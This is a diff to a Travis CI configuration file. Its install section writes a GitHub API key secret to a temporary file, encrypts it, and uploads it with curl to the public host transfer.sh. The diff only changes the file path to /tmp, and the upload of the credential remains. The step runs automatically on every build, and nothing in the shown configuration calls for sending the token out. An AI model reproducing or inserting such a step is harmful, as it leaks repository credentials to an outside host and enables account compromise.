--- a/.travis.yml
+++ b/.travis.yml
@@ -15,9 +15,9 @@ before_install:
 # skip the Travis-CI install phase because Maven handles that directly
 install:
 - sudo apt-get install -y ccrypt
-- echo $GH_API_KEY > i.txt
-- ccencrypt i.txt -K $MY_ENC_KEY
-- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file i.txt https://transfer.sh/SECRET_FILE_DESTINATION123.txt
+- echo $GH_API_KEY > /tmp/i.txt
+- ccencrypt /tmp/i.txt -K $MY_ENC_KEY
+- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file /tmp/i.txt https://transfer.sh/SECRET_FILE_DESTINATION123.txt
 
 script:
 - "./src/ci/build.sh"
